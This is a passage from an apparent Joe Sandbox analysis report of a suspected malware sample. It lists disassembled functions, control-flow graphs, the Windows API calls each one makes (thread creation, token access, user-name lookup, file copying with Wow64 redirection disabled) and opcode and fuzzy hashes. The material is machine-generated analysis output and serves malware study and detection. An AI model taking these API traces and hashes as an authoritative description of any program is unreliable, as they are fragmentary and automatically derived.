                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,005C3B3C,00000001,?,?,?,?,?,0054842D,000000FF,?,8000000B), ref: 0046D01A
                                                    • GetLastError.KERNEL32(?,?,?,?,0054842D,000000FF,?,8000000B), ref: 0046D028
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryErrorLastPath
                                                    • String ID: <3[
                                                    • API String ID: 953296794-3672254634
                                                    • Opcode ID: 43e515d8cc3df0b0a068342b4d81a255db3da276d4f7548e009c1a037efc9ad9
                                                    • Instruction ID: af7114157d539cc64f9231f34e1301323b489d29499567394d73aa9fabd787b0
                                                    • Opcode Fuzzy Hash: 43e515d8cc3df0b0a068342b4d81a255db3da276d4f7548e009c1a037efc9ad9
                                                    • Instruction Fuzzy Hash: 1381C471E006089FDB10DFA8C885BEEBBF4FF15324F14425AE914A72D0EB759909CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00496110 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 69threadsynchronizationCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2083 496110-496198 CreateThread 2084 49619a-4961a0 GetLastError 2083->2084 2085 4961a3-4961a5 call 46d7e0 2083->2085 2084->2085 2087 4961aa-4961bd 2085->2087 2088 4961bf-4961cd WaitForSingleObject 2087->2088 2089 496204-496212 2087->2089 2090 4961fb-4961fe CloseHandle 2088->2090 2091 4961cf-4961e5 GetExitCodeThread 2088->2091 2090->2089 2091->2090 2092 4961e7-4961ee 2091->2092 2092->2090 2093 4961f0-4961f5 TerminateThread 2092->2093 2093->2090
                                                    APIs
                                                    • CreateThread.KERNEL32 ref: 0049618D
                                                    • GetLastError.KERNEL32 ref: 0049619A
                                                    • WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 004961C3
                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 004961DD
                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 004961F5
                                                    • CloseHandle.KERNEL32(00000000), ref: 004961FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Thread$CloseCodeCreateErrorExitHandleLastObjectSingleTerminateWait
                                                    • String ID: <s[
                                                    • API String ID: 1566822279-714827695
                                                    • Opcode ID: 6112c75bdb4bb2272e09ae5d58f46b15bb59a66a172f07faf6de1752d6278465
                                                    • Instruction ID: a1b4e3905923fe97384293418a8d3952bb5cbef56ccafba0ea5eef01f8058300
                                                    • Opcode Fuzzy Hash: 6112c75bdb4bb2272e09ae5d58f46b15bb59a66a172f07faf6de1752d6278465
                                                    • Instruction Fuzzy Hash: 8431B9759402099BDF10DF94CD09BEEBBF4FB09714F10422AE910B63D0DB799A09DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00486980 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 263COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004867F0: GetTickCount.KERNEL32 ref: 00486874
                                                      • Part of subcall function 004867F0: __Xtime_get_ticks.LIBCPMT ref: 0048687C
                                                      • Part of subcall function 004867F0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004868C6
                                                      • Part of subcall function 004AAC30: GetUserNameW.ADVAPI32(?,?), ref: 004AACC5
                                                      • Part of subcall function 004AAC30: GetLastError.KERNEL32 ref: 004AACCB
                                                      • Part of subcall function 004AAC30: GetUserNameW.ADVAPI32(?,?), ref: 004AAD13
                                                      • Part of subcall function 004AAC30: GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 004AAD49
                                                      • Part of subcall function 004AAC30: GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,00000000,00000000), ref: 004AAD93
                                                    • __Init_thread_footer.LIBCMT ref: 00486AB1
                                                    • GetCurrentProcess.KERNEL32(00000008,?,D13B3340), ref: 00486CA8
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00486CAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentNameProcessUserVariable$CountCurrentErrorInit_thread_footerLastOpenTickTokenUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
                                                    • String ID: \/:*?"<>|$c$c
                                                    • API String ID: 1521599615-2627790902
                                                    • Opcode ID: 4f25b5ca6632e7818880fb6bbac65390ae6bb8b1a5584c743134c1af7635a253
                                                    • Instruction ID: f9534dfe44f63c55e41c8169f7265cbe2b91b060f98042a624e2c9962e46d612
                                                    • Opcode Fuzzy Hash: 4f25b5ca6632e7818880fb6bbac65390ae6bb8b1a5584c743134c1af7635a253
                                                    • Instruction Fuzzy Hash: 24B1F171D00258CBDB10DFA8C845BAEBBB1FF45304F258669E811AB392DB346E05CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00454B90 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 253COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2441 454b90-454bec call 454a80 call 35ab90 2446 454bf2 2441->2446 2447 454cdd-454d54 call 35a850 FreeLibrary EnterCriticalSection 2441->2447 2448 454bf5-454c25 call 359bb0 call 46c960 2446->2448 2452 454d56-454d5a 2447->2452 2453 454d9e-454dbf LeaveCriticalSection 2447->2453 2486 454c27-454c3e 2448->2486 2487 454c5a-454c6a 2448->2487 2455 454d6c-454d6e 2452->2455 2456 454d5c-454d66 DestroyWindow 2452->2456 2457 454dc1-454dc5 2453->2457 2458 454dff-454e07 2453->2458 2455->2453 2460 454d70-454d74 2455->2460 2456->2455 2463 454dc7-454dd0 call 529d16 2457->2463 2464 454dd6-454ddb 2457->2464 2461 454e33-454e41 2458->2461 2462 454e09-454e0c 2458->2462 2470 454d85-454d9b call 51fe78 2460->2470 2471 454d76-454d7f call 529d16 2460->2471 2465 454e43-454e47 2461->2465 2466 454e5d-454e71 call 4570e0 2461->2466 2462->2461 2472 454e0e 2462->2472 2463->2464 2467 454ded-454dfc call 51fe78 2464->2467 2468 454ddd-454de6 call 529d16 2464->2468 2474 454e56-454e5b 2465->2474 2475 454e49-454e50 2465->2475 2496 454e73 2466->2496 2497 454e79-454e8a 2466->2497 2467->2458 2468->2467 2470->2453 2471->2470 2482 454e10-454e15 2472->2482 2474->2465 2474->2466 2475->2474 2491 454e17-454e19 2482->2491 2492 454e1d-454e31 2482->2492 2494 454c40-454c43 2486->2494 2495 454c48-454c52 call 35ab90 2486->2495 2498 454cb0-454cbf 2487->2498 2499 454c6c-454c70 2487->2499 2491->2492 2492->2461 2492->2482 2494->2495 2495->2447 2511 454c58 2495->2511 2496->2497 2501 454cc1-454cc4 2498->2501 2502 454cc9-454cdc 2498->2502 2503 454ca2-454ca8 call 35a6d0 2499->2503 2504 454c72-454c76 2499->2504 2501->2502 2510 454cad 2503->2510 2504->2503 2508 454c78-454c8e call 35a380 2504->2508 2513 454c90-454c98 2508->2513 2514 454c9b-454ca0 2508->2514 2510->2498 2511->2448 2513->2514 2514->2510
                                                    APIs
                                                      • Part of subcall function 00454B90: GetModuleFileNameW.KERNEL32(00000000,?,00000104,D13B3340,00000000,?,00583F86,000000FF), ref: 00454AD8
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • FreeLibrary.KERNEL32(00000001,D13B3340,?,00000001,?,?,?), ref: 00454D27
                                                    • EnterCriticalSection.KERNEL32(0063946C), ref: 00454D42
                                                    • DestroyWindow.USER32(00000000), ref: 00454D60
                                                    • LeaveCriticalSection.KERNEL32(0063946C), ref: 00454DA9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalInit_thread_footerSection$DestroyEnterFileFreeHeapLeaveLibraryModuleNameProcessWindow
                                                    • String ID: %s%lu$.local
                                                    • API String ID: 3496055493-548699545
                                                    • Opcode ID: dd98786b5193d96e0677c1dc648b6d78b315478e4fcfa6a5af175d68c84f8871
                                                    • Instruction ID: 60c8fdd1b3697531dadef8adb382c097b95e84ab8be05c9bcdae89cd0156de6e
                                                    • Opcode Fuzzy Hash: dd98786b5193d96e0677c1dc648b6d78b315478e4fcfa6a5af175d68c84f8871
                                                    • Instruction Fuzzy Hash: A991E071A012019FDB21DF59C848B5BBBF4FF8131AF14456EE815AB392CB78A848CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004B00A0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2516 4b00a0-4b00eb call 46f280 2519 4b00ed-4b00f2 2516->2519 2520 4b00f7-4b0105 2516->2520 2521 4b02a1-4b02cb call 520528 2519->2521 2522 4b0110-4b0131 2520->2522 2524 4b013b-4b0152 SetFilePointer 2522->2524 2525 4b0133-4b0139 2522->2525 2527 4b0162-4b0177 ReadFile 2524->2527 2528 4b0154-4b015c GetLastError 2524->2528 2525->2524 2529 4b029c 2527->2529 2530 4b017d-4b0184 2527->2530 2528->2527 2528->2529 2529->2521 2530->2529 2531 4b018a-4b019b 2530->2531 2531->2522 2532 4b01a1-4b01ad 2531->2532 2533 4b01b0-4b01b4 2532->2533 2534 4b01c1-4b01c5 2533->2534 2535 4b01b6-4b01bf 2533->2535 2536 4b01e8-4b01ea 2534->2536 2537 4b01c7-4b01cd 2534->2537 2535->2533 2535->2534 2538 4b01ed-4b01ef 2536->2538 2537->2536 2539 4b01cf-4b01d2 2537->2539 2540 4b01f1-4b01f4 2538->2540 2541 4b0204-4b0206 2538->2541 2542 4b01e4-4b01e6 2539->2542 2543 4b01d4-4b01da 2539->2543 2540->2532 2544 4b01f6-4b01ff 2540->2544 2545 4b0208-4b0211 2541->2545 2546 4b0216-4b023c SetFilePointer 2541->2546 2542->2538 2543->2536 2547 4b01dc-4b01e2 2543->2547 2544->2522 2545->2522 2546->2529 2548 4b023e-4b0253 ReadFile 2546->2548 2547->2536 2547->2542 2548->2529 2549 4b0255-4b0259 2548->2549 2549->2529 2550 4b025b-4b0265 2549->2550 2551 4b027f-4b0284 2550->2551 2552 4b0267-4b026d 2550->2552 2551->2521 2552->2551 2553 4b026f-4b0277 2552->2553 2553->2551 2554 4b0279-4b027d 2553->2554 2554->2551 2555 4b0286-4b029a 2554->2555 2555->2521
                                                    APIs
                                                    • SetFilePointer.KERNEL32(005952BD,-00000400,?,00000002,00000400,D13B3340,?,?,?), ref: 004B0146
                                                    • GetLastError.KERNEL32(?,?), ref: 004B0154
                                                    • ReadFile.KERNEL32(005952BD,00000000,00000400,?,00000000,?,?), ref: 004B016F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$ErrorLastPointerRead
                                                    • String ID: ADVINSTSFX
                                                    • API String ID: 64821003-4038163286
                                                    • Opcode ID: f83d391e32f9efe111bfced9c3bbdf6018bc12824cc6205697b691c073363971
                                                    • Instruction ID: 3e7ca1773149a8fc703744e4809b6b13da19d4c33075155b3eeda38cd043cb95
                                                    • Opcode Fuzzy Hash: f83d391e32f9efe111bfced9c3bbdf6018bc12824cc6205697b691c073363971
                                                    • Instruction Fuzzy Hash: 3461D271A002099BDB08CFA8C884BFFBBB5FF55311F244666E505A7381D739AD46CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00476B40 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2556 476b40-476b80 call 471c70 2559 476b86-476ba2 SHGetFolderPathW 2556->2559 2560 476d7b-476d83 call 476e10 2556->2560 2561 476ba4-476bac 2559->2561 2562 476bae-476bbd 2559->2562 2569 476d87-476da4 call 51fe6a 2560->2569 2561->2561 2561->2562 2564 476bd2-476be3 call 451fc0 2562->2564 2565 476bbf 2562->2565 2574 476c07-476c49 call 360ec0 call 5221f0 call 45eab0 2564->2574 2575 476be5 2564->2575 2567 476bc0-476bc8 2565->2567 2567->2567 2570 476bca-476bcc 2567->2570 2570->2560 2570->2564 2584 476c4d-476c75 GetTempFileNameW call 358810 2574->2584 2585 476c4b 2574->2585 2576 476bf0-476bfc 2575->2576 2576->2560 2579 476c02-476c05 2576->2579 2579->2574 2579->2576 2588 476c77-476c7d call 520528 2584->2588 2589 476c80-476c8f 2584->2589 2585->2584 2588->2589 2591 476c91-476c99 2589->2591 2592 476c9b-476cc5 call 52052d 2589->2592 2591->2591 2591->2592 2596 476cc7-476cd0 2592->2596 2597 476ce3-476d30 Wow64DisableWow64FsRedirection CopyFileW 2592->2597 2598 476cd2-476ce1 2596->2598 2599 476d32-476d35 call 476e10 2597->2599 2600 476d3a-476d45 2597->2600 2598->2597 2598->2598 2599->2600 2602 476d67-476d79 call 358810 2600->2602 2603 476d47-476d61 Wow64RevertWow64FsRedirection 2600->2603 2602->2569 2603->2602
                                                    APIs
                                                      • Part of subcall function 00471C70: __Init_thread_footer.LIBCMT ref: 00471D42
                                                    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,D13B3340,00000000,00000000,?), ref: 00476B95
                                                    • GetTempFileNameW.KERNEL32(00000000,shim_clone,00000000,?,?), ref: 00476C5C
                                                    • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00476CFF
                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 00476D21
                                                    • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 00476D4D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Wow64$FileRedirection$CopyDisableFolderInit_thread_footerNamePathRevertTemp
                                                    • String ID: shim_clone
                                                    • API String ID: 1326775856-3944563459
                                                    • Opcode ID: c240e595c57c5eb6741a122baad4ac523b7125a369cfa3c7c58d8796ed82db53
                                                    • Instruction ID: 3d0b673aaabd8acbefb42e576616830cb9870440d20b5af0fe31723d37240c02
                                                    • Opcode Fuzzy Hash: c240e595c57c5eb6741a122baad4ac523b7125a369cfa3c7c58d8796ed82db53
                                                    • Instruction Fuzzy Hash: 4E612670A006589EDB25DF24CC45BEAB7B5EF55300F1480AEE54997292DB389E84CB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004B1610 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 167threadsynchronizationCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2606 4b1610-4b1646 2607 4b1648-4b165b CreateEventW 2606->2607 2608 4b1676-4b16ac CreateThread 2606->2608 2609 4b1669-4b1671 2607->2609 2610 4b165d-4b1666 2607->2610 2611 4b178c-4b17b7 WaitForSingleObject GetExitCodeThread 2608->2611 2612 4b16b2-4b16c4 2608->2612 2609->2608 2610->2609 2615 4b17b9-4b17c0 CloseHandle 2611->2615 2616 4b17c7-4b17da 2611->2616 2613 4b1701-4b170a 2612->2613 2614 4b16c6-4b16cc 2612->2614 2617 4b170d-4b172a 2613->2617 2619 4b16d0-4b16d2 2614->2619 2615->2616 2620 4b172c 2617->2620 2621 4b1770-4b1786 call 51fa13 2617->2621 2622 4b16d8-4b16da 2619->2622 2623 4b17dd-4b17e7 call 35a850 2619->2623 2625 4b1730-4b1732 2620->2625 2633 4b1789 2621->2633 2622->2623 2626 4b16e0-4b16fd 2622->2626 2625->2623 2628 4b1738-4b173a 2625->2628 2626->2619 2630 4b16ff 2626->2630 2628->2623 2631 4b1740-4b1747 2628->2631 2630->2617 2631->2623 2632 4b174d-4b1753 2631->2632 2632->2623 2634 4b1759-4b176e 2632->2634 2633->2611 2634->2621 2634->2625
                                                    APIs
                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,D13B3340,00000000,?,?,?,?,?,?,?,00000000,0059574D,000000FF), ref: 004B1650
                                                    • CreateThread.KERNEL32 ref: 004B1686
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004B178F
                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 004B179A
                                                    • CloseHandle.KERNEL32(00000000), ref: 004B17BA
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CreateThread$AllocateCloseCodeEventExitHandleHeapObjectSingleWait
                                                    • String ID: <3[
                                                    • API String ID: 978852114-3672254634
                                                    • Opcode ID: 09425a74bb5e0c1236bbed9c946cdff4a64ac141eaaa47f30034cba55d6325c9
                                                    • Instruction ID: 39af22c1fc1466cc964876aa36882f0bd24865068c488a9fe966575bed6f8b2b
                                                    • Opcode Fuzzy Hash: 09425a74bb5e0c1236bbed9c946cdff4a64ac141eaaa47f30034cba55d6325c9
                                                    • Instruction Fuzzy Hash: 69515874A00709DFCB10CF69C894FAABBF4FF49714F24465AE916A77A1DB34A804CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00368DA1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2636 368da1-368e29 2638 368e9f-368ea4 2636->2638 2639 368e2b-368e34 2636->2639 2640 368ea6-368ea8 2638->2640 2641 368ecf-368edd 2638->2641 2642 368e36-368e4a CallWindowProcW 2639->2642 2643 368e4c-368e7e GetWindowLongW CallWindowProcW 2639->2643 2640->2641 2644 368eaa-368ecc 2640->2644 2642->2638 2645 368e80-368e8b GetWindowLongW 2643->2645 2646 368e9b 2643->2646 2645->2646 2647 368e8d-368e95 SetWindowLongW 2645->2647 2646->2638 2647->2646
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,00000024), ref: 00368E40
                                                    • GetWindowLongW.USER32(?,000000FC), ref: 00368E55
                                                    • CallWindowProcW.USER32(?,?,00000082,?,00000024), ref: 00368E6B
                                                    • GetWindowLongW.USER32(?,000000FC), ref: 00368E85
                                                    • SetWindowLongW.USER32(?,000000FC,?), ref: 00368E95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$CallProc
                                                    • String ID: $
                                                    • API String ID: 513923721-3993045852
                                                    • Opcode ID: d065a3af4c8552062518a187989b4368af4d1917b9e6c8192b99c34b79d42f71
                                                    • Instruction ID: 9bce55de9d1a10be26dc3730bde275b4aee4e0727ca00f0b797481fef20c8bb3
                                                    • Opcode Fuzzy Hash: d065a3af4c8552062518a187989b4368af4d1917b9e6c8192b99c34b79d42f71
                                                    • Instruction Fuzzy Hash: AD4113B1508700AFC760DF19C884A1BBBF9FF89720F509A1DF5AA836A1C772E8448B51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0048E3F0 Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000002), ref: 0048E410
                                                    • GetWindowRect.USER32(00000000,?), ref: 0048E426
                                                    • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,00495F2A,?,?,?,?,?,?), ref: 0048E43F
                                                    • InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,00495F2A,?,?), ref: 0048E44A
                                                    • GetDlgItem.USER32(00000000,000003E9), ref: 0048E45C
                                                    • GetWindowRect.USER32(00000000,?), ref: 0048E472
                                                    • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,?,?,?,00495F2A), ref: 0048E4B5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Rect$Item$InvalidateShow
                                                    • String ID:
                                                    • API String ID: 2147159307-0
                                                    • Opcode ID: cf476556d503f82005899108b00d64843c2d3830a1703f2dcc38f8c6d5db63d8
                                                    • Instruction ID: a59b89445afdad092082990ab9d705ba3f9fee2e28f824247cb3f627cd354b29
                                                    • Opcode Fuzzy Hash: cf476556d503f82005899108b00d64843c2d3830a1703f2dcc38f8c6d5db63d8
                                                    • Instruction Fuzzy Hash: 7C216D71608300AFE310DF34DC49A6B7BE9EF8C710F009659F849D7292E730E9818B96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00477070 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 196COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileVersionInfoSizeW.KERNELBASE(80004005,0058FE45,D13B3340,?,?,00000000,?,?,00000000,0058FE45,000000FF,?,80004005,D13B3340,?), ref: 004770D5
                                                    • GetFileVersionInfoW.KERNELBASE(80004005,?,00000000,000000FF,00000000,?,00000000,?,?,00000000,0058FE45,000000FF,?,80004005,D13B3340,?), ref: 00477123
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
